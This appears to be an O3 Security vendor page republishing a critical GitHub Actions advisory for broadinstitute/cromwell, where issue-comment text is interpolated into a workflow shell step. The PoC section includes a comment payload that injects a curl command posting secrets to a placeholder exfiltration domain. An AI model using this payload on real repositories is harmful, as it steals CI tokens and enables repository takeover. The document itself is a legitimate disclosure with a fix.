How severe is GHSA-phf6-hm3h-x8qp?

GHSA-phf6-hm3h-x8qp has a CVSS score of 9.1/10, rated CRITICAL. Immediate patching is strongly recommended.

Which packages are affected by GHSA-phf6-hm3h-x8qp?

GHSA-phf6-hm3h-x8qp affects the following packages: broadinstitute/cromwell (GitHub Actions). Ecosystems affected: GitHub Actions.

How do I fix GHSA-phf6-hm3h-x8qp?

Update broadinstitute/cromwell to 90 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-phf6-hm3h-x8qp is resolved across your whole dependency graph.

How do I detect GHSA-phf6-hm3h-x8qp in my GitHub Actions dependencies?

Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for broadinstitute/cromwell. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.

How do I mitigate GHSA-phf6-hm3h-x8qp if there is no patch (or I can't update yet)?

If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

How does O3 Security protect against GHSA-phf6-hm3h-x8qp?

O3 pinpoints whether GHSA-phf6-hm3h-x8qp is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Is GHSA-phf6-hm3h-x8qp actively exploited in the wild?

No public exploit code has been indexed for GHSA-phf6-hm3h-x8qp yet. This does not mean the vulnerability cannot be exploited — absence of public exploits does not imply safety. Apply the recommended fix and use O3 Security to monitor your exposure.

When was GHSA-phf6-hm3h-x8qp published, and has it been updated?

GHSA-phf6-hm3h-x8qp was published on May 28, 2025 and was last updated on May 28, 2025. Advisory data evolves as severity scores, affected ranges, and exploit intelligence are revised — always check the latest version of the advisory before acting.

📦 GitHub Actions

GHSA-phf6-hm3h-x8qp

CRITICAL

Cromwell GitHub Actions Secrets exfiltration via `Issue_comment`

Published

May 28, 2025

Updated

May 28, 2025

Affected

1 pkg

Patched

1 / 1

Exploits

None indexed

Blast Radius

1 pkg affected

📦broadinstitute/cromwell

Real-time download stats are indexed for npm and PyPI packages. This vulnerability affects GitHub Actions packages — download data is not available via public APIs for these ecosystems.

Description

Summary

Using Issue_comment on .github/workflows/scalafmt-fix.yml an attacker can inject malicious code using github.event.comment.body. By exploiting the vulnerability, it is possible to exfiltrate high privileged GITHUB_TOKEN which can be used to completely overtake the repo since the token has content privileges. In addition ,it is possible to exfiltrate also the secret:

BROADBOT_GITHUB_TOKEN

Details

The Issue_comment in GitHub Actions might be an injection path if the variable isn't handle as it should. In the following step it's vulnerable because it directly interpolates untrusted user input into a shell script.

      - name: Check for ScalaFmt Comment
        id: check-comment
        run: |
          if [[ "${{ github.event_name }}" == "issue_comment" && "${{ github.event.comment.body }}" == *"scalafmt"* ]]; then
            echo "::set-output name=comment-triggered::true"
          else
            echo "::set-output name=comment-triggered::false"
          fi

In this case, it is possible to exfiltrate GITHUB_TOKEN and BROADBOT_GITHUB_TOKEN secrets.

PoC

To exploit the vulnerability an attacker can just drop a comment to any issue formed in the following way to exploit the vulnerability in the workflow .github/workflows/update_pylon_issue.yml.

test" == "test" ]]; then
  & curl -s -d "$B64_BLOB" "https://$YOUR_EXFIL_DOMAIN/token" > /dev/null #

To prove this is possible, we created an issue and we added a comment with the malicious code to extract the GITHUB_TOKEN and BROADBOT_GITHUB_TOKEN secret. With the GITHUB_TOKEN extracted we were able to push a new poc tag which has been deleted after a couple of minutes.

Impact

Usually with GITHUB_TOKEN and write permissions, an attacker is able to completely overtake the repo.

GITHUB_TOKEN Permissions
  Actions: write
  Attestations: write
  Checks: write
  Contents: write
  Deployments: write
  Discussions: write
  Issues: write
  Metadata: read
  Models: read
  Packages: write
  Pages: write
  PullRequests: write
  RepositoryProjects: write
  SecurityEvents: write
  Statuses: write

We also checked BROADBOT_GITHUB_TOKEN permission to check if we could move laterally to org level. In this case the token seems scoped to this specific repo but it gives an attacker persistence without the need of a valid GITHUB_TOKEN. We suggest to rotate the BROADBOT_GITHUB_TOKEN token asap.

Fix

Avoid directly interpolating untrusted user input into a shell script. Use GitHub Actions input context safely like:

- name: Dump comment
  run: echo "Comment Body: $BODY"
  env:
    BODY: ${{ github.event.comment.body }}

This safely passes the comment as an environment variable rather than interpolating it in-place.

Scope GIHTUB_TOKEN permissions to just what the actions needs to do. In this case, if it's specific for issues:

permissions:
  issues: write

Kindly reported by @darryk10 @AlbertoPellitteri @loresuso

Affected Packages

1 total 1 fixed

Ecosystem	Package	Vulnerable range	Fix
📦GitHub Actions	`broadinstitute/cromwell`	≥ 87&&< 90	90

Detection & mitigation playbook

Open-source dependency

Detect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for broadinstitute/cromwell. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update broadinstitute/cromwell to 90 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-phf6-hm3h-x8qp is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-phf6-hm3h-x8qp is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Tailored to GHSA-phf6-hm3h-x8qp. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

Frequently Asked Questions

### Summary Using `Issue_comment` on `.github/workflows/scalafmt-fix.yml` an attacker can inject malicious code using `github.event.comment.body`. By exploiting the vulnerability, it is possible to exfiltrate high privileged `GITHUB_TOKEN` which can be used to completely overtake the repo since the token has content privileges. In addition ,it is possible to exfiltrate also the secret: - `BROADBOT_GITHUB_TOKEN ` ### Details The `Issue_comment` in GitHub Actions might be an injection path if the variable isn't handle as it should. In the following step it's vulnerable because it directly inter

O3 Security · Impact-Aware SCA

Is GHSA-phf6-hm3h-x8qp in your dependencies?

O3 detects GHSA-phf6-hm3h-x8qp across GitHub Actions dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.

Scan my dependencies How O3 SCA works